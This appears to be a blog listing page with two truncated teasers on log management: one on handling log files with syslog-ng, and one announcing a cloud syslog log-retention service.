Log Management

Log file management via syslog-ng Giacomo Lanzi

Log File Management with the Secure Online Desktop Service

Reading time: 5 min. IT systems produce large quantities of log files, which are very useful tools for ensuring data security and application stability. However, in a complex ecosystem, the number of files and their location can become two insurmountable obstacles when the data needs to be consulted efficiently. Here…

syslog server Piergiorgio Venuti

New service | Log Management – The high-performance service for log retention

syslog server – The high-performance service for log retention. Use all the strengths of syslog-ng Premium Edition. Search logs, secure sensitive data with granular access policies, and generate reports. Forward logs to third-party tools. SYSLOG SERVER – CLOUD LOG MANAGEMENT SERVICE TO MANAGE THE…
